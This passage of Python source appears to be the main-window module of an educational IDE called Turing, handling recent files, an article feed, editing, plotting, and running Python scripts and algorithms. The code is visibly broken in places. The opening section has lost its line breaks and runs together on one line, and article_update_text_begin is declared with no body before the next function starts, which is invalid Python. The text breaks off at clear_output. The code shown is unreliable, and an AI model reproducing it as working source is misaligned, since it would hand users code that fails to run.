sorted(list(set(recent)))[0:10] util.settings.setValue("recent", json.dumps(recent)) recent_update_text() def recent_update_text(): recent = json.loads(util.settings.value("recent", "[]")) recent = [f for f in recent if os.path.isfile(f)] util.settings.setValue("recent", json.dumps(recent)) for i, file in enumerate(recent): ExecState.recent_actions[i].setText(os.path.basename(file)) ExecState.recent_buttons[i].setText(os.path.basename(file)) _, ext = os.path.splitext(file.lower()) if ext == ".alg": icon = QIcon(":/action/media/algobox.ico") elif ext == ".tr": icon = GuiState.ui.tabWidget.tabIcon(1) elif ext == ".py": icon = GuiState.ui.tabWidget.tabIcon(2) else: icon = QIcon() ExecState.recent_actions[i].setIcon(icon) ExecState.recent_buttons[i].setIcon(icon) ExecState.recent_actions[i].setVisible(True) ExecState.recent_buttons[i].setVisible(i < 7) for i in range(len(recent), 10): ExecState.recent_actions[i].setVisible(False) ExecState.recent_buttons[i].setVisible(False) ExecState.recent_actions[i].setIcon(QIcon()) ExecState.recent_buttons[i].setIcon(QIcon()) fix_qt_shitty_margins() def recent_clicked(index): recent = json.loads(util.settings.value("recent", "[]")) if index < len(recent) and recent[index]: load_file(recent[index]) def recent_init_actions(): ExecState.recent_actions = [] ExecState.recent_buttons = [] def generator(num): return lambda: recent_clicked(num) for i in range(10): act = QAction(GuiState.window) act.setVisible(False) act.triggered.connect(generator(i)) ExecState.recent_actions.append(act) GuiState.ui.menuRecent.insertAction(GuiState.ui.actionClearRecent, act) btn = QFlatButton(GuiState.window) btn.setVisible(False) btn.clicked.connect(generator(i)) ExecState.recent_buttons.append(btn) GuiState.ui.verticalLayout_10.addWidget(btn) GuiState.ui.menuRecent.insertSeparator(GuiState.ui.actionClearRecent) GuiState.ui.verticalLayout_10.addItem(QSpacerItem(1, 2, QSizePolicy.Minimum, QSizePolicy.Expanding)) recent_update_text() def article_clicked(i): 
QDesktopServices.openUrl(QUrl(ExecState.article_list[i][1])) def article_fetch(language): import urllib.request from xml.etree import ElementTree response = urllib.request.urlopen( urllib.request.Request("https://turingapp.ml/%s/feed/" % language, headers={'User-Agent': 'Mozilla/5.0'})) xml = ElementTree.fromstring(response.read()) result = [] for elem in xml[0].iter("item"): result.append((elem.find("title").text, elem.find("link").text)) return result def article_init_actions(update=True): ExecState.article_buttons = [] ExecState.article_list = [] def generator(i): return lambda: article_clicked(i) for i in range(7): btn = QFlatButton(GuiState.window) btn.setVisible(False) btn.clicked.connect(generator(i)) ExecState.article_buttons.append(btn) GuiState.ui.verticalLayout_11.addWidget(btn) GuiState.ui.verticalLayout_11.addItem(QSpacerItem(1, 2, QSizePolicy.Minimum, QSizePolicy.Expanding)) if update: return article_update_text_begin() def article_remove_button(): if GuiState.article_load_widgets is not None: GuiState.ui.verticalLayout_11.removeWidget(GuiState.article_load_widgets[0]) GuiState.article_load_widgets[0].deleteLater() GuiState.ui.verticalLayout_11.removeItem(GuiState.article_load_widgets[1]) GuiState.article_load_widgets = None for btn in ExecState.article_buttons: btn.setVisible(False) def article_init_button(): article_remove_button() btn = QFlatButton(GuiState.window) spacer = QSpacerItem(1, 2, QSizePolicy.Minimum, QSizePolicy.Expanding) GuiState.article_load_widgets = (btn, spacer) def handler(): set_load_recent_articles(True) article_update_text_begin(True) btn.setIcon(QIcon(":/action/media/download.png")) btn.setText(translate("MainWindow", "Load recent articles")) btn.clicked.connect(handler) GuiState.ui.verticalLayout_11.addWidget(btn) GuiState.ui.verticalLayout_11.addItem(spacer) def article_loader(): ExecState.article_list = article_fetch(translator.current_lang) or article_fetch("") def article_update_text_begin(both=False): 
def article_update_text_end(thr=None):
    """Wait for the fetch thread (keeping the UI alive), then show the titles."""
    if thr is not None:
        while thr.is_alive():
            QCoreApplication.processEvents()
    for pos, (title, _) in enumerate(ExecState.article_list):
        ExecState.article_buttons[pos].setText(title)
        ExecState.article_buttons[pos].setVisible(True)
    for pos in range(len(ExecState.article_list), 7):
        ExecState.article_buttons[pos].setVisible(False)


class MainWindowWrapper(QMainWindow):
    """Main window subclass that confirms before discarding unsaved changes."""

    def closeEvent(self, event):
        if not is_modified():
            event.setAccepted(True)
            clean_exit()
            return
        msg = msg_box(translate("MainWindow", "Do you really want to exit?\nAll unsaved changes will be lost."),
                      parent=self)
        event.ignore()
        if msg.exec_() == QMessageBox.Yes:
            event.setAccepted(True)
            clean_exit()


def get_action(name: str) -> QAction:
    """Return the UI action whose object name is 'action' + *name*."""
    return getattr(GuiState.ui, "action" + name)


def refresh():
    """Redraw the plot, toolbar state, algorithm tree and window title."""
    plot_update()
    refresh_buttons_status()
    if not AppState.mode_python:
        refresh_algo()
        algo_sel_changed()
    refresh_window_title()


def refresh_window_title():
    """Update the title bar from the current file name and modified state."""
    if GuiState.ui.tabWidget.currentIndex() == 0:
        title = "Turing"
    elif AppState.current_file:
        filename = os.path.basename(AppState.current_file)
        if is_modified():
            title = translate("MainWindow", "Turing - {file} (unsaved)").format(file=filename)
        else:
            title = translate("MainWindow", "Turing - {file}").format(file=filename)
    else:
        title = translate("MainWindow", "Turing - New File")
    GuiState.window.setWindowTitle(title)


def refresh_buttons_status():
    """Enable/disable and show/hide actions according to the current mode."""
    if AppState.mode_python:
        # Mirror the enabled state of the embedded editor's own actions.
        for ours, theirs in GuiState.editor_action_table:
            get_action(ours).setEnabled(getattr(GuiState.code_editor, "action_" + theirs).isEnabled())
    active_code = True
    for name in ["Save", "SaveAs", "Print", "Find", "Replace", "Run", "Step", "ConvertToPython"]:
        get_action(name).setEnabled(active_code)
    for name in GuiState.python_only:
        get_action(name).setVisible(AppState.mode_python)
    for name in GuiState.algo_only:
        get_action(name).setVisible(not AppState.mode_python)


def handler_Undo():
    if AppState.mode_python:
        GuiState.code_editor.undo()


def handler_Redo():
    if AppState.mode_python:
        GuiState.code_editor.redo()


def handler_SelectAll():
    GuiState.code_editor.selectAll()


def handler_Cut():
    if AppState.mode_python:
        GuiState.code_editor.cut()


def handler_Copy():
    if AppState.mode_python:
        GuiState.code_editor.copy()


def handler_Paste():
    if AppState.mode_python:
        GuiState.code_editor.paste()


def handler_DuplicateLine():
    if AppState.mode_python:
        GuiState.code_editor.duplicate_line()
    else:
        btn_dupl_line()


def handler_Indent():
    GuiState.code_editor.indent()


def handler_Unindent():
    GuiState.code_editor.un_indent()


def handler_GoToLine():
    GuiState.code_editor.goto_line()


def handler_Find():
    GuiState.panel_search.on_search()


def handler_FindPrevious():
    GuiState.panel_search.select_previous()


def handler_FindNext():
    GuiState.panel_search.select_next()


def handler_Replace():
    GuiState.panel_search.on_search_and_replace()


def handler_Calculator():
    from forms import calculator
    calculator.CalculatorWindow()


def handler_ChangTheme():
    """Open the theme editor; restore the previous theme if it is cancelled."""
    from forms import changtheme
    backup = util.settings.value("app_theme")
    dlg = changtheme.ChangeThemeWindow(GuiState.window, theming.themes[backup][1])
    dlg.theme_callback = lambda: set_theme("custom")
    if dlg.run():
        util.settings.setValue("custom_theme", theming.themes["custom"][1])
        for act in GuiState.ui.menuChangeTheme.actions():
            if act.statusTip() == "custom":
                act.setVisible(True)
                break
    else:
        set_theme(backup)


def handler_HelpContents():
    from forms import help
    help.HelpWindow(GuiState.window)


def change_tab():
    """Keep AppState.mode_python in sync with the selected main tab."""
    if GuiState.ui.tabWidget.currentIndex() == 1:
        AppState.mode_python = False
    elif GuiState.ui.tabWidget.currentIndex() == 2:
        AppState.mode_python = True
    refresh()


def python_print(*args, end="\n"):
    """print() replacement that appends HTML-escaped text to the output pane."""
    ExecState.current_output += html.escape(" ".join(str(arg) for arg in args))
    ExecState.current_output += end
    update_output()
def update_output():
    """Render the accumulated output (plus any pending suffix) in the pane."""
    GuiState.ui.txtOutput.setHtml(
        '<pre style="margin: 0">%s</pre>' % (ExecState.current_output + ExecState.after_output))
    GuiState.ui.txtOutput.moveCursor(QTextCursor.End)
    GuiState.ui.txtOutput.ensureCursorVisible()
    # Collapse a trailing blank line so the output does not drift downwards.
    if ExecState.current_output.endswith("\n\n"):
        ExecState.current_output = ExecState.current_output[:-1]
    plot_update()


def check_stop():
    """Raise KeyboardInterrupt when the user asked the program to stop."""
    if ExecState.stopped or (not AppState.mode_python and ExecState.worker.finished):
        raise KeyboardInterrupt()


def python_input(prompt="", globals=None, locals=None, unsafe=False):
    """input() replacement: prompt in the output pane, read from the input box.

    The returned value is coerced: with unsafe=True the raw text is first
    tried as a Python expression, then int and float conversions are
    attempted (plus complex when unsafe), and finally the raw string is
    returned unchanged.
    """
    python_print(prompt, end="")
    plot_update()
    ExecState.after_output = "<hr>"
    ExecState.after_output += util.html.centered(
        "<h3>%s</h3>" % util.html.color_span(
            "<i>%s</i>" % translate("MainWindow", "Input: ") + html.escape(prompt), "red"))
    update_output()
    GuiState.ui.btnSendInput.setEnabled(True)
    GuiState.ui.txtInput.setEnabled(True)
    GuiState.ui.txtInput.setFocus(Qt.OtherFocusReason)
    for _ in range(3):
        if not GuiState.ui.txtInput.text():
            # Blink the input box to draw the user's attention.
            for color in ("#ffbaba", "#ff7b7b", "#ff5252", "#ff7b7b", "#ffbaba"):
                GuiState.ui.txtInput.setStyleSheet("QLineEdit { background-color: %s; }" % color)
                sleep(0.050)
            GuiState.ui.txtInput.setStyleSheet("")
            sleep(0.200)
    ExecState.user_input = None
    while ExecState.user_input is None:
        check_stop()
        QCoreApplication.processEvents()
    GuiState.ui.btnSendInput.setEnabled(False)
    GuiState.ui.txtInput.setEnabled(False)
    GuiState.ui.txtInput.setText("")
    ExecState.after_output = ""
    python_print(ExecState.user_input)
    update_output()
    # BUG FIX: these fallbacks used bare `except:`, which also swallowed
    # KeyboardInterrupt/SystemExit (KeyboardInterrupt is this app's stop
    # signal, see check_stop); catch only genuine conversion errors.
    if unsafe:
        try:
            # NOTE(review): eval of user input is intentional in unsafe mode.
            return eval(ExecState.user_input, globals, locals)
        except Exception:
            pass
    try:
        return int(ExecState.user_input)
    except Exception:
        pass
    try:
        return float(ExecState.user_input)
    except Exception:
        pass
    if unsafe:
        try:
            return complex(ExecState.user_input)
        except Exception:
            pass
    return ExecState.user_input


def python_print_error(msg, end="\n"):
    """Append *msg* in red to the output; highlight the failing algo line."""
    ExecState.current_output += util.html.color_span(msg, "red") + end
    if not AppState.mode_python:
        set_current_line(ExecState.worker.last, True)
    update_output()


def plot_update():
    """Redraw the plot canvas if it has been created."""
    if GuiState.plot_axes is not None and GuiState.plot_canvas is not None:
        GuiState.plot_axes.grid(linestyle='-')
        GuiState.plot_canvas.draw()


def plot_clear():
    """Clear the axes, keeping the x=0 / y=0 reference lines."""
    GuiState.plot_axes.clear()
    GuiState.plot_axes.axhline(y=0, color='k')
    GuiState.plot_axes.axvline(x=0, color='k')


def plot_reset():
    """Reset the plot to an empty [-10, 10] x [-10, 10] view."""
    plot_clear()
    plot_window(-10, 10, -10, 10)
    plot_update()


def plot_window(xmin, xmax, ymin, ymax, xgrad=0, ygrad=0):
    """Set the view window; a zero graduation means automatic ticks."""
    GuiState.plot_axes.set_xlim(xmin, xmax)
    GuiState.plot_axes.set_ylim(ymin, ymax)
    GuiState.plot_axes.get_xaxis().set_major_locator(
        AutoLocator() if xgrad == 0 else LinearLocator(abs(int((xmax - xmin) / xgrad)) + 1))
    GuiState.plot_axes.get_yaxis().set_major_locator(
        AutoLocator() if ygrad == 0 else LinearLocator(abs(int((ymax - ymin) / ygrad)) + 1))


def plot_point(x, y, color="red"):
    """Draw a single point."""
    GuiState.plot_axes.scatter([x], [y], c=color)


def plot_line(startx, starty, endx, endy, color="red"):
    """Draw a segment with end markers."""
    GuiState.plot_axes.plot([startx, endx], [starty, endy], c=color, linestyle="-", marker="o")


def plot_function(func, start, end, step, color="red"):
    """Plot *func* over [start, end) sampled every *step*."""
    domain = [x.item() for x in np.arange(start, end, step)]
    results = [func(x) for x in domain]
    GuiState.plot_axes.plot(domain, results, c=color, linestyle="-")


def stmt_GClear(stmt: GClearStmt):
    plot_clear()


def stmt_GWindow(stmt: GWindowStmt):
    plot_window(ExecState.worker.evaluator.eval_node(stmt.x_min),
                ExecState.worker.evaluator.eval_node(stmt.x_max),
                ExecState.worker.evaluator.eval_node(stmt.y_min),
                ExecState.worker.evaluator.eval_node(stmt.y_max),
                ExecState.worker.evaluator.eval_node(stmt.x_grad),
                ExecState.worker.evaluator.eval_node(stmt.y_grad))
def stmt_GPoint(stmt: GPointStmt):
    plot_point(ExecState.worker.evaluator.eval_node(stmt.x),
               ExecState.worker.evaluator.eval_node(stmt.y),
               ExecState.worker.evaluator.eval_node(stmt.color))


def stmt_GLine(stmt: GLineStmt):
    plot_line(ExecState.worker.evaluator.eval_node(stmt.start_x),
              ExecState.worker.evaluator.eval_node(stmt.start_y),
              ExecState.worker.evaluator.eval_node(stmt.end_x),
              ExecState.worker.evaluator.eval_node(stmt.end_y),
              ExecState.worker.evaluator.eval_node(stmt.color))


def stmt_GFunc(stmt: GFuncStmt):
    plot_function(ExecState.worker.evaluator.eval_node(stmt.get_function()),
                  ExecState.worker.evaluator.eval_node(stmt.start),
                  ExecState.worker.evaluator.eval_node(stmt.end),
                  ExecState.worker.evaluator.eval_node(stmt.step),
                  ExecState.worker.evaluator.eval_node(stmt.color))


def stmt_Sleep(stmt: SleepStmt):
    sleep_seconds(ExecState.worker.evaluator.eval_node(stmt.duration))


def init_worker():
    """Create and configure a fresh Worker for the current algorithm."""
    from algo.worker import Worker
    ExecState.worker = Worker(AppState.algo.children)
    ExecState.worker.callback_print = python_print
    ExecState.worker.callback_input = python_input
    ExecState.worker.log.set_callback(python_print_error)
    ExecState.worker.log.use_prefix = False
    ExecState.worker.init()
    ExecState.worker.callback_stop = callback_stop
    # Route graphics/sleep statements to the GUI implementations.
    ExecState.worker.map[GClearStmt] = stmt_GClear
    ExecState.worker.map[GWindowStmt] = stmt_GWindow
    ExecState.worker.map[GPointStmt] = stmt_GPoint
    ExecState.worker.map[GLineStmt] = stmt_GLine
    ExecState.worker.map[GFuncStmt] = stmt_GFunc
    ExecState.worker.map[SleepStmt] = stmt_Sleep
    set_current_line(None)
    plot_reset()


def end_output():
    """Append the 'end of output' banner, with elapsed time when available."""
    ExecState.current_output += util.html.centered(
        util.html.color_span(translate("MainWindow", "end of output")
                             if ExecState.run_started is None
                             else translate("MainWindow", "end of output [{time}]").format(
                                 time=datetime.datetime.now() - ExecState.run_started),
                             "red"))
    ExecState.current_output += "<hr />\n"
    ExecState.run_started = None
    update_output()


def set_current_line(current: Optional[BaseStmt], error=False):
    """Highlight *current* in the algo tree (yellow, or red on error)."""
    for item, stmt in GuiState.item_map.values():
        if stmt == current:
            item.setBackground(0, QBrush(QColor("#ef5350") if error else QColor("#fdd835")))
        else:
            item.setBackground(0, GuiState.root_item.background(0))


def callback_stop(stmt, virtual=False):
    """Worker callback for Stop statements; *virtual* keeps the run alive."""
    breakpoint_message(ExecState.worker.evaluator.eval_node(stmt.message))
    if not virtual:
        ExecState.worker.finished = True


def breakpoint_message(message=""):
    """Show a breakpoint banner below the output."""
    ExecState.after_output = "<hr>"
    ExecState.after_output += util.html.centered(
        "<h3>%s</h3>" % util.html.color_span("<i>%s</i>" % (
            translate("MainWindow", "Breakpoint: ") + html.escape(str(message))
            if message else
            translate("MainWindow", "Breakpoint")), "red"))
    update_output()


def python_breakpoint(message=""):
    """breakpoint() replacement: pause the script until Run is pressed again."""
    breakpoint_message(message)
    ExecState.python_stopped = True
    GuiState.ui.actionRun.setDisabled(False)
    GuiState.ui.actionStop.setDisabled(False)
    while ExecState.python_stopped and not ExecState.stopped:
        QCoreApplication.processEvents()
    if ExecState.stopped:
        raise KeyboardInterrupt()
    ExecState.after_output = ""
    update_output()
    GuiState.ui.actionRun.setDisabled(True)
    GuiState.ui.actionStop.setDisabled(True)


def handler_Stop():
    """Interrupt the running program (Python script or algorithm)."""
    python_print_error(translate("MainWindow", "program interrupted"))
    ExecState.after_output = ""
    ExecState.stopped = True
    if AppState.mode_python:
        ExecState.running = False
        ExecState.python_stopped = False
    else:
        ExecState.running = True
        ExecState.worker.finished = True
        ExecState.worker.error = False
        ExecState.stop_flag = True
        handler_Step()
        ExecState.stop_flag = False
    update_output()


def handler_Step():
    """Execute a single statement of the algorithm (stepping mode)."""
    GuiState.ui.actionNew.setDisabled(True)
    GuiState.ui.actionOpen.setDisabled(True)
    GuiState.ui.actionRun.setDisabled(True)
    GuiState.ui.actionDebug.setDisabled(True)
    GuiState.ui.actionStep.setDisabled(True)
    GuiState.ui.actionStop.setEnabled(True)
    try:
        if AppState.mode_python:
            pass
        else:
            if not ExecState.stopped:
                if ExecState.running:
                    if ExecState.skip_step:
                        ExecState.skip_step = False
                        ExecState.after_output = ""
                        update_output()
                    else:
                        if isinstance(ExecState.current_stmt, StopStmt):
                            # Virtual stop: show the message but keep stepping.
                            callback_stop(ExecState.current_stmt, True)
                            ExecState.skip_step = True
                        else:
                            ExecState.worker.exec_stmt(ExecState.current_stmt)
                else:
                    init_worker()
                    ExecState.running = True
                if not ExecState.skip_step and not ExecState.worker.error:
                    ExecState.current_stmt = ExecState.worker.next_stmt()
                    set_current_line(ExecState.current_stmt)
            else:
                ExecState.stopped = False
        QCoreApplication.processEvents()
        plot_update()
    except:
        # NOTE(review): kept broad on purpose — show_error() reports
        # whatever the worker raised, including non-Exception signals.
        show_error()
    finally:
        plot_update()
        if ExecState.worker.finished:
            GuiState.ui.actionRun.setDisabled(False)
            if not ExecState.stop_flag:
                end_output()
            if not ExecState.worker.error:
                set_current_line(None)
            ExecState.running = False
        GuiState.ui.actionDebug.setDisabled(False)
        GuiState.ui.actionStep.setDisabled(False)
        GuiState.ui.actionNew.setDisabled(not ExecState.worker.finished)
        GuiState.ui.actionOpen.setDisabled(not ExecState.worker.finished)
        GuiState.ui.actionStop.setEnabled(not ExecState.worker.finished)


def handler_Debug():
    """Run the algorithm in debug mode (stops at breakpoints)."""
    handler_Run(True)


class compat_list(list):
    """List that grows automatically when assigning past the end (algo compat)."""

    def __setitem__(self, key, value):
        # BUG FIX: auto-extend with zeros only for plain integer indices;
        # the old unconditional `len(self) <= key` comparison raised a
        # TypeError for slice assignment (e.g. lst[1:3] = [...]).
        if isinstance(key, int):
            while len(self) <= key:
                self.append(0)
        super().__setitem__(key, value)


def handler_Run(flag=False):
    """Run the current program; *flag* selects algorithm debug mode."""
    if ExecState.python_stopped:
        # Resume from a breakpoint instead of starting a new run.
        ExecState.python_stopped = False
        return
    if not flag and not AppState.mode_python:
        algo_run_python()
        return
    GuiState.ui.actionNew.setDisabled(True)
    GuiState.ui.actionOpen.setDisabled(True)
    GuiState.ui.actionRun.setDisabled(True)
    GuiState.ui.actionDebug.setDisabled(True)
    GuiState.ui.actionStep.setDisabled(True)
    GuiState.ui.actionStop.setEnabled(True)
    user_stop = False
    set_current_line(None)
    try:
        if AppState.mode_python:
            file = tempfile.NamedTemporaryFile(mode="w+b", suffix=".py", delete=False)
            try:
                code = util.code.python_wrapper(GuiState.code_editor.toPlainText()).encode("utf8")
                file.write(code)
                file.close()
                ExecState.running = True
                ExecState.stopped = False
                ExecState.python_stopped = False
                plot_reset()
                ExecState.run_started = datetime.datetime.now()
                runpy.run_path(file.name, init_globals={
                    "print": python_print,
                    "input": python_input,
                    "breakpoint": python_breakpoint,
                    "list": compat_list,
                    "sleep": sleep_seconds,
                    "g_clear": plot_clear,
                    "g_window": plot_window,
                    "g_point": plot_point,
                    "g_line": plot_line,
                    "g_func": plot_function,
                    "plot": GuiState.plot_axes
                })
                plot_update()
            except SyntaxError as err:
                # BUG FIX: err.offset / err.text (and lineno) may be None for
                # some syntax errors; guard them so the reporter cannot crash.
                off = err.offset or 0
                text = err.text or ""
                msg = translate("MainWindow", "Syntax error ({type}) at line {line}, offset {off}: ").format(
                    type=type(err).__name__, line=(err.lineno or 0) - util.code.line_offset, off=off)
                python_print_error(msg + html.escape(text), end="")
                python_print_error(" " * (len(msg) + off - 1) + "↑")
            except KeyboardInterrupt:
                pass
            except:
                python_print_error(html.escape(str(sys.exc_info()[1])))
            finally:
                os.unlink(file.name)
                plot_update()
        else:
            if not ExecState.running:
                init_worker()
                plot_reset()
                ExecState.worker.break_on_error = True
                ExecState.running = True
                ExecState.stopped = False
                ExecState.run_started = datetime.datetime.now()
                ExecState.skip_step = False
            else:
                if ExecState.skip_step:
                    ExecState.skip_step = False
                    ExecState.after_output = ""
                    update_output()
                else:
                    ExecState.worker.exec_stmt(ExecState.current_stmt)
                    if not ExecState.worker.error:
                        set_current_line(None)
            while not ExecState.worker.finished:
                ExecState.worker.step()
                QCoreApplication.processEvents()
    except KeyboardInterrupt:
        user_stop = True
    except:
        show_error()
    finally:
        plot_update()
        if not AppState.mode_python and ExecState.worker.stopped:
            # Paused at a breakpoint: keep the run resumable.
            GuiState.ui.actionStep.setDisabled(False)
            GuiState.ui.actionDebug.setDisabled(False)
            set_current_line(ExecState.worker.last)
            ExecState.skip_step = True
            ExecState.worker.finished = False
            ExecState.worker.stopped = False
        else:
            if not user_stop:
                end_output()
            GuiState.ui.actionNew.setDisabled(False)
            GuiState.ui.actionOpen.setDisabled(False)
            GuiState.ui.actionRun.setDisabled(False)
            GuiState.ui.actionStep.setDisabled(False)
            GuiState.ui.actionDebug.setDisabled(False)
            GuiState.ui.actionStop.setEnabled(False)
            ExecState.running = False
def load_python_code():
    """Convert the current algorithm to Python and put it in the editor."""
    import autopep8
    py_code = autopep8.fix_code("\n".join(AppState.algo.python()))
    GuiState.code_editor.setPlainText(py_code.replace("\t", " "), "", "")


def handler_ConvertToPython():
    """Switch to Python mode using code generated from the algorithm."""
    load_python_code()
    AppState.mode_python = True
    AppState.current_file = None
    refresh()


def algo_run_python():
    """Run the algorithm by converting it to Python and executing that."""
    load_python_code()
    AppState.mode_python = True
    handler_Run()
    AppState.mode_python = False


def handler_AboutTuring():
    import forms.about
    forms.about.AboutWindow(GuiState.window, util.__version__, util.__channel__).run()


def handler_Examples():
    """Let the user pick one of the bundled example files."""
    msg = msg_box_info(translate("MainWindow",
                                 "You are about to choose an example file\nfrom the `examples` directory. To guess what examples are,\nyou can guess from the file names."))
    msg.exec_()
    # Probe the usual install/data locations for an `examples` directory.
    data_dirs = ["/usr/share/turing/",
                 os.path.dirname(os.path.realpath(__file__)),
                 os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
                 os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))] + \
                QStandardPaths.standardLocations(QStandardPaths.DataLocation) + \
                QStandardPaths.standardLocations(QStandardPaths.AppDataLocation)
    data_dirs = [os.path.join(x, "examples") for x in data_dirs]
    handler_Open(whichDir=first_found_dir(data_dirs))


def set_show_toolbar(show):
    """Show/hide the toolbar and persist the choice."""
    if show:
        GuiState.ui.toolBar.show()
    else:
        GuiState.ui.toolBar.hide()
    util.settings.setValue("show_toolbar", show)
    GuiState.ui.actionShowToolbar.setChecked(show)


def handler_ShowToolbar():
    set_show_toolbar(not GuiState.ui.toolBar.isVisible())


def set_show_toolbar_text(show):
    """Toggle text-under-icon style on the toolbar and persist it."""
    style = Qt.ToolButtonTextUnderIcon if show else Qt.ToolButtonIconOnly
    GuiState.ui.toolBar.setToolButtonStyle(style)
    util.settings.setValue("show_toolbar_text", show)
    GuiState.ui.actionShowToolbarText.setChecked(show)


def handler_ShowToolbarText():
    set_show_toolbar_text(GuiState.ui.toolBar.toolButtonStyle() == Qt.ToolButtonIconOnly)


def save(filename):
    """Serialize the current document to *filename* and refresh the UI."""
    if AppState.mode_python:
        ExecState.last_saved = str(GuiState.code_editor.toPlainText())
    else:
        ExecState.last_saved = repr(AppState.algo)
    with open(filename, "w+", encoding="utf8") as savefile:
        savefile.write(ExecState.last_saved)
    recent_add(filename)
    refresh()


def save_output():
    """Ask for a path and dump the output pane to a text file."""
    file = QFileDialog.getSaveFileName(GuiState.window, translate("MainWindow", "Save output"), "",
                                       translate("MainWindow", "Text files (*.txt)"))[0]
    if not file:
        return
    with open(file, "w+", encoding="utf8") as savefile:
        savefile.write(GuiState.ui.txtOutput.toPlainText())


def handler_SaveAs():
    """Ask for a destination, then delegate to handler_Save."""
    file = QFileDialog.getSaveFileName(GuiState.window, translate("MainWindow", "Save"), "",
                                       GuiState.filters[["tr", "py"][AppState.mode_python]])[0]
    if not file:
        return
    AppState.current_file = file
    handler_Save()


def handler_Save():
    """Save to the current file, prompting for a path when needed."""
    if not AppState.current_file:
        handler_SaveAs()
        return
    try:
        save(AppState.current_file)
    except PermissionError:
        msg = msg_box_info(
            translate("MainWindow", "You are not allowed to write to {},\nplease choose another file path.").format(
                AppState.current_file))
        msg.exec_()
        handler_SaveAs()


def handler_Open(whichDir=""):
    """
    callback function to open a file

    @param whichDir the directory to browse initially
    """
    sel_file, _ = QFileDialog.getOpenFileName(
        GuiState.window, translate("MainWindow", "Open"), whichDir or "",
        ";;".join(GuiState.filters.values()))
    if not sel_file:
        return
    load_file(sel_file)


def load_file(file):
    """Load a .alg/.tr/.py file and switch the UI to the matching mode."""
    AppState.current_file = file
    _, ext = os.path.splitext(AppState.current_file.lower())
    with open(AppState.current_file, "r", encoding="utf8") as openfile:
        newcode = openfile.read()
    if ext == ".alg":
        from algo.frontends.algobox import parse_algobox
        AppState.mode_python = False
        load_block(parse_algobox(newcode))
        ExecState.last_saved = repr(AppState.algo)
    elif ext == ".tr":
        AppState.mode_python = False
        load_pseudocode(newcode)
        ExecState.last_saved = repr(AppState.algo)
    elif ext == ".py":
        AppState.mode_python = True
        GuiState.code_editor.setPlainText(newcode, "", "")
        ExecState.last_saved = newcode
    recent_add(AppState.current_file)
    set_correct_tab()
    refresh()


def set_correct_tab():
    """Select the algo or Python tab according to the current mode."""
    GuiState.ui.tabWidget.setCurrentIndex(2 if AppState.mode_python else 1)


def handler_New():
    """Reset to an empty document after confirming unsaved changes."""
    if is_modified():
        msg = msg_box(
            translate("MainWindow", "Do you really want to create a new file?\nAll unsaved changes will be lost."),
            parent=GuiState.window)
        if msg.exec_() != QMessageBox.Yes:
            return
    AppState.current_file = None
    AppState.algo = BlockStmt([])
    GuiState.code_editor.setPlainText("", "", "")
    set_correct_tab()
    refresh()


def handler_ZoomIn():
    if AppState.mode_python:
        GuiState.code_editor.zoom_in()
    else:
        set_algo_size(GuiState.ui.treeWidget.font().pointSize() + 1)


def handler_ZoomOut():
    if AppState.mode_python:
        GuiState.code_editor.zoom_out()
    else:
        set_algo_size(GuiState.ui.treeWidget.font().pointSize() - 1)
def handler_ResetZoom():
    if AppState.mode_python:
        GuiState.code_editor.reset_zoom()
    else:
        set_algo_size(GuiState.algo_base_font.pointSize())


def set_algo_size(size):
    """Apply font point size *size* (minimum 1) to the algorithm tree widgets."""
    if size < 1:
        size = 1
    set_font_size(GuiState.ui.treeWidget, size)
    for idstmt, (item, stmt) in GuiState.item_map.items():
        set_font_size(item, size, 0)
        if hasattr(item, "lbl"):
            set_font_size(item.lbl, size)


def init_action_handlers():
    """Connect every actionX to the module function handler_X, when it exists."""
    for item in dir(GuiState.ui):
        if item.startswith("action"):
            name = "handler_" + item[6:]
            if name in globals():
                getattr(GuiState.ui, item).triggered.connect(globals()[name])


def copy_action(source: QAction, target: QAction):
    """Make *target* look like *source* and forward its trigger."""
    target.setText(source.text())
    target.setIcon(source.icon())
    target.triggered.disconnect()
    target.triggered.connect(source.trigger)


def load_languages():
    """Populate the language menu from the bundled locale icon resources."""
    def make_handler(loc):
        # Bind loc now; a bare lambda would late-bind the loop variable.
        return lambda: change_language(loc)

    it = QDirIterator(":/lang/media/lang")
    while it.hasNext():
        cur = it.next()
        locale_name, _ = os.path.splitext(os.path.basename(cur))
        locale = QLocale(locale_name)
        act = QAction(GuiState.window)
        act.setCheckable(True)
        act.setIcon(QIcon(cur))
        act.setText(locale.nativeLanguageName())
        act.triggered.connect(make_handler(locale_name))
        GuiState.ui.menuLanguage.addAction(act)
        GuiState.lng_actions[locale_name] = act


def fix_tabwidget_width():
    """Give the side widget a fixed sensible width after (re)translation."""
    GuiState.ui.tabWidget_2.setMinimumWidth(
        sum(GuiState.ui.tabWidget_2.tabBar().tabRect(x).width()
            for x in range(GuiState.ui.tabWidget_2.count())))
    GuiState.ui.widget.setMinimumWidth(0)
    GuiState.ui.widget.setMaximumWidth(16777215)
    GuiState.ui.widget.adjustSize()
    # BUG FIX: width() / 3 is a float in Python 3, and Qt width setters
    # require an int; truncate so setMinimumWidth cannot raise TypeError.
    width = max(int(GuiState.window.width() / 3), GuiState.ui.widget.width())
    GuiState.ui.widget.setMinimumWidth(width)
    GuiState.ui.widget.setMaximumWidth(width)


def refresh_locs():
    """Re-translate theme menu entries after a language change."""
    for act in GuiState.ui.menuChangeTheme.actions():
        if act.statusTip():
            act.setText(theming.themes[act.statusTip()][0]())


def change_language(language: str):
    """Switch the UI language, falling back to 'en' when unavailable."""
    available = GuiState.lng_actions.keys()
    if language not in available:
        if util.get_short_lang(language) in available:
            language = util.get_short_lang(language)
        else:
            language = "en"
    translator.load(language)
    GuiState.ui.menubar.resizeEvent(QResizeEvent(GuiState.ui.menubar.size(), GuiState.ui.menubar.size()))
    load_editor_actions()
    for loc, act in GuiState.lng_actions.items():
        act.setChecked(loc == language)
    fix_qt_shitty_margins()
    fix_tabwidget_width()
    if sys.platform in ["darwin", "linux"]:
        GuiState.ui.menuLanguage.setTitle(QLocale(language).nativeLanguageName())
    # BUG FIX: read the setting once so `thr` cannot be referenced while
    # unbound if the setting changes between the two original reads.
    load_articles = util.settings.value("load_articles", False, type=bool)
    if load_articles:
        thr = article_update_text_begin()
    else:
        article_init_button()
    refresh_locs()
    refresh()
    if load_articles:
        article_update_text_end(thr)


def send_user_input():
    """Deliver the input-box text to the waiting python_input() call."""
    ExecState.user_input = GuiState.ui.txtInput.text()


def clear_output():
    """Wipe the output pane and reset the plot."""
